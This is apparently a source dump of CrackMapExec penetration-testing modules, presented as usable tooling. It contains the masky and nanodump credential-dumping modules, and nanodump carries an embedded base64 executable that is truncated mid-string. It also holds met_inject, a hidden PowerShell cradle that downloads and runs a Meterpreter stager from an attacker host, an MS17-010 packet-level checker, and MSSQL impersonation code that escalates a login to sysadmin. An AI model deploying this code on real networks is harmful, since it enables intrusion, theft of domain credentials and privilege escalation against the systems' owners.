def process_credentials(self, context, connection, credentials):
if len(credentials) == 0:
context.log.display("No credentials found")
credz_bh = []
domain = None
for cred in credentials:
if cred["domain"] == None:
cred["domain"] = ""
domain = cred["domain"]
if "." not in cred["domain"] and cred["domain"].upper() in connection.domain.upper():
domain = connection.domain # slim shady
self.save_credentials(
context,
connection,
cred["domain"],
cred["username"],
cred["password"],
cred["lmhash"],
cred["nthash"],
)
self.print_credentials(
context,
cred["domain"],
cred["username"],
cred["password"],
cred["lmhash"],
cred["nthash"],
)
credz_bh.append({"username": cred["username"].upper(), "domain": domain.upper()})
add_user_bh(credz_bh, domain, context.log, connection.config)
@staticmethod
def print_credentials(context, domain, username, password, lmhash, nthash):
if password is None:
password = ":".join(h for h in [lmhash, nthash] if h is not None)
output = "%s\\%s %s" % (domain, username, password)
context.log.highlight(output)
@staticmethod
def save_credentials(context, connection, domain, username, password, lmhash, nthash):
host_id = context.db.get_hosts(connection.host)[0][0]
if password is not None:
credential_type = "plaintext"
else:
credential_type = "hash"
password = ":".join(h for h in [lmhash, nthash] if h is not None)
context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
================================================
FILE: cme/modules/masky.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from masky import Masky
from cme.helpers.bloodhound import add_user_bh
class CMEModule:
name = "masky"
description = "Remotely dump domain user credentials via an ADCS and a KDC"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
CA Certificate Authority Name (CA_SERVER\CA_NAME)
TEMPLATE Template name allowing users to authenticate with (default: User)
DC_IP IP Address of the domain controller
AGENT_EXE Path to a custom executable masky agent to be deployed
"""
self.template = "User"
self.ca = None
self.dc_ip = None
self.agent_exe = None
self.file_args = False
if "CA" in module_options:
self.ca = module_options["CA"]
if "TEMPLATE" in module_options:
self.template = module_options["TEMPLATE"]
if "DC_IP" in module_options:
self.dc_ip = module_options["DC_IP"]
if "AGENT_EXE" in module_options:
self.agent_exe = module_options["AGENT_EXE"]
self.file_args = True
def on_admin_login(self, context, connection):
if not self.ca:
context.log.fail("Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)")
return False
host = connection.host
domain = connection.domain
username = connection.username
kerberos = connection.kerberos
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
m = Masky(
ca=self.ca,
template=self.template,
user=username,
dc_ip=self.dc_ip,
domain=domain,
password=password,
hashes=f"{lmhash}:{nthash}",
kerberos=kerberos,
exe_path=self.agent_exe,
file_args=self.file_args,
)
context.log.display("Running Masky on the targeted host")
rslts = m.run(host)
tracker = m.get_last_tracker()
self.process_results(connection, context, rslts, tracker)
return self.process_errors(context, tracker)
def process_results(self, connection, context, rslts, tracker):
if not tracker.nb_hijacked_users:
context.log.display("No users' sessions were hijacked")
else:
context.log.display(f"{tracker.nb_hijacked_users} session(s) successfully hijacked")
context.log.display("Attempting to retrieve NT hash(es) via PKINIT")
if not rslts:
return False
pwned_users = 0
for user in rslts.users:
if user.nthash:
context.log.highlight(f"{user.domain}\{user.name} {user.nthash}")
self.process_credentials(connection, context, user)
pwned_users += 1
if pwned_users:
context.log.success(f"{pwned_users} NT hash(es) successfully collected")
else:
context.log.fail("Unable to collect NT hash(es) from the hijacked session(s)")
return True
def process_credentials(self, connection, context, user):
host = context.db.get_hosts(connection.host)[0][0]
context.db.add_credential(
"hash",
user.domain,
user.name,
user.nthash,
pillaged_from=host,
)
add_user_bh(user.name, user.domain, context.log, connection.config)
def process_errors(self, context, tracker):
ret = True
if tracker.last_error_msg:
context.log.fail(tracker.last_error_msg)
ret = False
if not tracker.files_cleaning_success:
context.log.fail("Fail to clean files related to Masky")
context.log.fail((f"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', " f"'{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\Windows\\Temp\\'"))
ret = False
if not tracker.svc_cleaning_success:
context.log.fail(f"Fail to remove the service named '{tracker.svc_name}', please remove it manually")
ret = False
return ret
================================================
FILE: cme/modules/met_inject.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sys import exit
class CMEModule:
"""
Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
Module by @byt3bl33d3r
"""
name = "met_inject"
description = "Downloads the Meterpreter stager and injects it into memory"
supported_protocols = ["smb", "mssql"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.rand = None
self.srvport = None
self.srvhost = None
self.met_ssl = None
self.context = context
self.module_options = module_options
def options(self, context, module_options):
"""
SRVHOST IP hosting of the stager server
SRVPORT Stager port
RAND Random string given by metasploit (if using web_delivery)
SSL Stager server use https or http (default: https)
multi/handler method that don't require RAND:
Set LHOST and LPORT (called SRVHOST and SRVPORT in CME module options)
Set payload to one of the following (non-exhaustive list):
windows/x64/powershell_reverse_tcp
windows/x64/powershell_reverse_tcp_ssl
Web Delivery Method (exploit/multi/script/web_delivery):
Set SRVHOST and SRVPORT
Set payload to what you want (windows/meterpreter/reverse_https, etc)
after running, copy the end of the URL printed (e.g. M5LemwmDHV) and set RAND to that
"""
self.met_ssl = "https"
if "SRVHOST" not in module_options or "SRVPORT" not in module_options:
context.log.fail("SRVHOST and SRVPORT options are required!")
exit(1)
if "SSL" in module_options:
self.met_ssl = module_options["SSL"]
if "RAND" in module_options:
self.rand = module_options["RAND"]
self.srvhost = module_options["SRVHOST"]
self.srvport = module_options["SRVPORT"]
def on_admin_login(self, context, connection):
# stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
command = """$url="{}://{}:{}/{}"
$DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\powershell.exe'
if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessInfo.FileName=$PowershellExe
$ProcessInfo.Arguments="-nop -c $DownloadCradle"
$ProcessInfo.UseShellExecute = $False
$ProcessInfo.RedirectStandardOutput = $True
$ProcessInfo.CreateNoWindow = $True
$ProcessInfo.WindowStyle = "Hidden"
$Process = [System.Diagnostics.Process]::Start($ProcessInfo)""".format(
"http" if self.met_ssl == "http" else "https",
self.srvhost,
self.srvport,
self.rand,
)
context.log.debug(command)
connection.ps_execute(command, force_ps32=True)
context.log.success("Executed payload")
================================================
FILE: cme/modules/ms17-010.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# All credits to https://github.com/d4t4s3c/Win7Blue
# @d4t4s3c
# Module by @mpgn_x64
from ctypes import *
import socket
import struct
class CMEModule:
name = "ms17-010"
description = "MS17-010, /!\ not tested oustide home lab"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
""" """
def on_login(self, context, connection):
if check(connection.host):
context.log.highlight("VULNERABLE")
context.log.highlight("Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/")
class SMB_HEADER(Structure):
"""SMB Header decoder."""
_pack_ = 1
_fields_ = [
("server_component", c_uint32),
("smb_command", c_uint8),
("error_class", c_uint8),
("reserved1", c_uint8),
("error_code", c_uint16),
("flags", c_uint8),
("flags2", c_uint16),
("process_id_high", c_uint16),
("signature", c_uint64),
("reserved2", c_uint16),
("tree_id", c_uint16),
("process_id", c_uint16),
("user_id", c_uint16),
("multiplex_id", c_uint16),
]
def __new__(self, buffer=None):
return self.from_buffer_copy(buffer)
def generate_smb_proto_payload(*protos):
"""Generate SMB Protocol. Pakcet protos in order."""
hexdata = []
for proto in protos:
hexdata.extend(proto)
return "".join(hexdata)
def calculate_doublepulsar_xor_key(s):
"""Calaculate Doublepulsar Xor Key"""
x = 2 * s ^ (((s & 0xFF00 | (s << 16)) << 8) | (((s >> 16) | s & 0xFF0000) >> 8))
x = x & 0xFFFFFFFF
return x
def negotiate_proto_request():
"""Generate a negotiate_proto_request packet."""
netbios = ["\x00", "\x00\x00\x54"]
smb_header = [
"\xFF\x53\x4D\x42",
"\x72",
"\x00\x00\x00\x00",
"\x18",
"\x01\x28",
"\x00\x00",
"\x00\x00\x00\x00\x00\x00\x00\x00",
"\x00\x00",
"\x00\x00",
"\x2F\x4B",
"\x00\x00",
"\xC5\x5E",
]
negotiate_proto_request = [
"\x00",
"\x31\x00",
"\x02",
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00",
"\x02",
"\x4C\x4D\x31\x2E\x32\x58\x30\x30\x32\x00",
"\x02",
"\x4E\x54\x20\x4C\x41\x4E\x4D\x41\x4E\x20\x31\x2E\x30\x00",
"\x02",
"\x4E\x54\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00",
]
return generate_smb_proto_payload(netbios, smb_header, negotiate_proto_request)
def session_setup_andx_request():
"""Generate session setuo andx request."""
netbios = ["\x00", "\x00\x00\x63"]
smb_header = [
"\xFF\x53\x4D\x42",
"\x73",
"\x00\x00\x00\x00",
"\x18",
"\x01\x20",
"\x00\x00",
"\x00\x00\x00\x00\x00\x00\x00\x00",
"\x00\x00",
"\x00\x00",
"\x2F\x4B",
"\x00\x00",
"\xC5\x5E",
]
session_setup_andx_request = [
"\x0D",
"\xFF",
"\x00",
"\x00\x00",
"\xDF\xFF",
"\x02\x00",
"\x01\x00",
"\x00\x00\x00\x00",
"\x00\x00",
"\x00\x00",
"\x00\x00\x00\x00",
"\x40\x00\x00\x00",
"\x26\x00",
"\x00",
"\x2e\x00",
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x32\x31\x39\x35\x00",
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x35\x2e\x30\x00",
]
return generate_smb_proto_payload(netbios, smb_header, session_setup_andx_request)
def tree_connect_andx_request(ip, userid):
"""Generate tree connect andx request."""
netbios = ["\x00", "\x00\x00\x47"]
smb_header = [
"\xFF\x53\x4D\x42",
"\x75",
"\x00\x00\x00\x00",
"\x18",
"\x01\x20",
"\x00\x00",
"\x00\x00\x00\x00\x00\x00\x00\x00",
"\x00\x00",
"\x00\x00",
"\x2F\x4B",
userid,
"\xC5\x5E",
]
ipc = "\\\\{}\IPC$\x00".format(ip)
tree_connect_andx_request = [
"\x04",
"\xFF",
"\x00",
"\x00\x00",
"\x00\x00",
"\x01\x00",
"\x1A\x00",
"\x00",
ipc.encode(),
"\x3f\x3f\x3f\x3f\x3f\x00",
]
length = len("".join(smb_header)) + len("".join(tree_connect_andx_request))
netbios[1] = struct.pack(">L", length)[-3:]
return generate_smb_proto_payload(netbios, smb_header, tree_connect_andx_request)
def peeknamedpipe_request(treeid, processid, userid, multiplex_id):
"""Generate tran2 request"""
netbios = ["\x00", "\x00\x00\x4a"]
smb_header = [
"\xFF\x53\x4D\x42",
"\x25",
"\x00\x00\x00\x00",
"\x18",
"\x01\x28",
"\x00\x00",
"\x00\x00\x00\x00\x00\x00\x00\x00",
"\x00\x00",
treeid,
processid,
userid,
multiplex_id,
]
tran_request = [
"\x10",
"\x00\x00",
"\x00\x00",
"\xff\xff",
"\xff\xff",
"\x00",
"\x00",
"\x00\x00",
"\x00\x00\x00\x00",
"\x00\x00",
"\x00\x00",
"\x4a\x00",
"\x00\x00",
"\x4a\x00",
"\x02",
"\x00",
"\x23\x00",
"\x00\x00",
"\x07\x00",
"\x5c\x50\x49\x50\x45\x5c\x00",
]
return generate_smb_proto_payload(netbios, smb_header, tran_request)
def trans2_request(treeid, processid, userid, multiplex_id):
"""Generate trans2 request."""
netbios = ["\x00", "\x00\x00\x4f"]
smb_header = [
"\xFF\x53\x4D\x42",
"\x32",
"\x00\x00\x00\x00",
"\x18",
"\x07\xc0",
"\x00\x00",
"\x00\x00\x00\x00\x00\x00\x00\x00",
"\x00\x00",
treeid,
processid,
userid,
multiplex_id,
]
trans2_request = [
"\x0f",
"\x0c\x00",
"\x00\x00",
"\x01\x00",
"\x00\x00",
"\x00",
"\x00",
"\x00\x00",
"\xa6\xd9\xa4\x00",
"\x00\x00",
"\x0c\x00",
"\x42\x00",
"\x00\x00",
"\x4e\x00",
"\x01",
"\x00",
"\x0e\x00",
"\x00\x00",
"\x0c\x00" + "\x00" * 12,
]
return generate_smb_proto_payload(netbios, smb_header, trans2_request)
def check(ip, port=445):
"""Check if MS17_010 SMB Vulnerability exists."""
try:
buffersize = 1024
timeout = 5.0
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(timeout)
client.connect((ip, port))
raw_proto = negotiate_proto_request()
client.send(raw_proto)
tcp_response = client.recv(buffersize)
raw_proto = session_setup_andx_request()
client.send(raw_proto)
tcp_response = client.recv(buffersize)
netbios = tcp_response[:4]
smb_header = tcp_response[4:36]
smb = SMB_HEADER(smb_header)
user_id = struct.pack(" User:
if initial_user.is_sysadmin:
self.context.log.success(f"{initial_user.username} is sysadmin")
return initial_user
elif initial_user.dbowner:
self.context.log.success(f"{initial_user.username} can privesc via dbowner")
return initial_user
for grantor in user.grantors:
if grantor.is_sysadmin:
self.context.log.success(f"{user.username} can impersonate: " f"{grantor.username} (sysadmin)")
return grantor
elif grantor.dbowner:
self.context.log.success(f"{user.username} can impersonate: {grantor.username} (which can privesc via dbowner)")
return grantor
else:
self.context.log.display(f"{user.username} can impersonate: {grantor.username}")
return self.browse_path(context, initial_user, grantor)
def query_and_get_output(self, query):
# try:
results = self.mssql_conn.sql_query(query)
# self.mssql_conn.printRows()
# query_output = self.mssql_conn._MSSQL__rowsPrinter.getMessage()
# query_output = results.strip("\n-")
return results
# except Exception as e:
# return False
def sql_exec_as(self, grantors: list) -> str:
exec_as = []
for grantor in grantors:
exec_as.append(f"EXECUTE AS LOGIN = '{grantor}';")
return "".join(exec_as)
def perform_impersonation_check(self, user: User, grantors=[]):
# build EXECUTE AS if any grantors is specified
exec_as = self.sql_exec_as(grantors)
# do we have any privilege ?
if self.update_priv(user, exec_as):
return
# do we have any grantors ?
new_grantors = self.get_impersonate_users(exec_as)
for new_grantor in new_grantors:
# skip the case when we can impersonate ourself
if new_grantor == user.username:
continue
# create a new user and add it as a grantor of the current user
if new_grantor not in grantors:
new_user = User(new_grantor)
new_user.parent = user
user.grantors.append(new_user)
grantors.append(new_grantor)
# perform the same check on the grantor
self.perform_impersonation_check(new_user, grantors)
def update_priv(self, user: User, exec_as=""):
if self.is_admin_user(user.username):
user.is_sysadmin = True
return True
user.dbowner = self.check_dbowner_privesc(exec_as)
return user.dbowner
def get_current_username(self) -> str:
return self.query_and_get_output("select SUSER_NAME()")[0][""]
def is_admin(self, exec_as="") -> bool:
res = self.query_and_get_output(exec_as + "SELECT IS_SRVROLEMEMBER('sysadmin')")
self.revert_context(exec_as)
is_admin = res[0][""]
self.context.log.debug(f"IsAdmin Result: {is_admin}")
if is_admin:
self.context.log.debug(f"User is admin!")
self.admin_privs = True
return True
else:
return False
def get_databases(self, exec_as="") -> list:
res = self.query_and_get_output(exec_as + "SELECT name FROM master..sysdatabases")
self.revert_context(exec_as)
self.context.log.debug(f"Response: {res}")
self.context.log.debug(f"Response Type: {type(res)}")
tables = [table["name"] for table in res]
return tables
def is_dbowner(self, database, exec_as="") -> bool:
query = f"""select rp.name as database_role
from [{database}].sys.database_role_members drm
join [{database}].sys.database_principals rp
on (drm.role_principal_id = rp.principal_id)
join [{database}].sys.database_principals mp
on (drm.member_principal_id = mp.principal_id)
where rp.name = 'db_owner' and mp.name = SYSTEM_USER"""
self.context.log.debug(f"Query: {query}")
res = self.query_and_get_output(exec_as + query)
self.context.log.debug(f"Response: {res}")
self.revert_context(exec_as)
if res:
if "database_role" in res[0] and res[0]["database_role"] == "db_owner":
return True
else:
return False
return False
def find_dbowner_priv(self, databases, exec_as="") -> list:
match = []
for database in databases:
if self.is_dbowner(database, exec_as):
match.append(database)
return match
def find_trusted_db(self, exec_as="") -> list:
query = """SELECT d.name AS DATABASENAME
FROM sys.server_principals r
INNER JOIN sys.server_role_members m
ON r.principal_id = m.role_principal_id
INNER JOIN sys.server_principals p ON
p.principal_id = m.member_principal_id
inner join sys.databases d
on suser_sname(d.owner_sid) = p.name
WHERE is_trustworthy_on = 1 AND d.name NOT IN ('MSDB')
and r.type = 'R' and r.name = N'sysadmin'"""
res = self.query_and_get_output(exec_as + query)
self.revert_context(exec_as)
return res
def check_dbowner_privesc(self, exec_as=""):
databases = self.get_databases(exec_as)
dbowner = self.find_dbowner_priv(databases, exec_as)
trusted_db = self.find_trusted_db(exec_as)
# return the first match
for db in dbowner:
if db in trusted_db:
return db
return None
def do_dbowner_privesc(self, database, exec_as=""):
# change context if necessary
self.query_and_get_output(exec_as)
# use database
self.query_and_get_output(f"use {database};")
query = f"""CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
as
begin
EXEC sp_addsrvrolemember '{self.current_username}','sysadmin'
end"""
self.query_and_get_output(query)
self.query_and_get_output("EXEC sp_elevate_me;")
self.query_and_get_output("DROP PROCEDURE sp_elevate_me;")
self.revert_context(exec_as)
def do_impersonation_privesc(self, username, exec_as=""):
# change context if necessary
self.query_and_get_output(exec_as)
# update our privilege
self.query_and_get_output(f"EXEC sp_addsrvrolemember '{username}', 'sysadmin'")
self.revert_context(exec_as)
def get_impersonate_users(self, exec_as="") -> list:
query = """SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name like 'IMPERSONATE%'"""
res = self.query_and_get_output(exec_as + query)
# self.context.log.debug(f"Result: {res}")
self.revert_context(exec_as)
users = [user["name"] for user in res]
return users
def remove_sysadmin_priv(self) -> bool:
res = self.query_and_get_output(f"EXEC sp_dropsrvrolemember '{self.current_username}', 'sysadmin'")
return not self.is_admin()
def is_admin_user(self, username) -> bool:
res = self.query_and_get_output(f"SELECT IS_SRVROLEMEMBER('sysadmin', '{username}')")
try:
if int(res):
self.admin_privs = True
return True
else:
return False
except:
return False
def revert_context(self, exec_as):
self.query_and_get_output("REVERT;" * exec_as.count("EXECUTE"))
================================================
FILE: cme/modules/nanodump.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# nanodump module for CME python3
# author of the module : github.com/mpgn
# nanodump: https://github.com/helpsystems/nanodump
import base64
import sys
import os
from datetime import datetime
from pypykatz.pypykatz import pypykatz
from cme.helpers.bloodhound import add_user_bh
from cme.protocols.mssql.mssqlexec import MSSQLEXEC
class CMEModule:
name = "nanodump"
description = "Get lsass dump using nanodump and parse the result with pypykatz"
supported_protocols = ["smb", "mssql"]
opsec_safe = False
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.connection = None
self.dir_result = None
self.tmp_dir = None
self.useembeded = None
self.nano = None
self.nano_path = None
self.nano_embedded64 = None
self.tmp_share = None
self.share = None
self.context = context
self.module_options = module_options
def options(self, context, module_options):
"""
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
NANO_PATH Path where nano.exe is on your system (default: /tmp/cme/)
NANO_EXE_NAME Name of the nano executable (default: nano.exe)
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)
"""
self.context = context
self.tmp_dir = "C:\\Windows\\Temp\\"
self.share = "C$"
self.tmp_share = self.tmp_dir.split(":")[1]
self.nano_embedded64 = base64.b64decode(
"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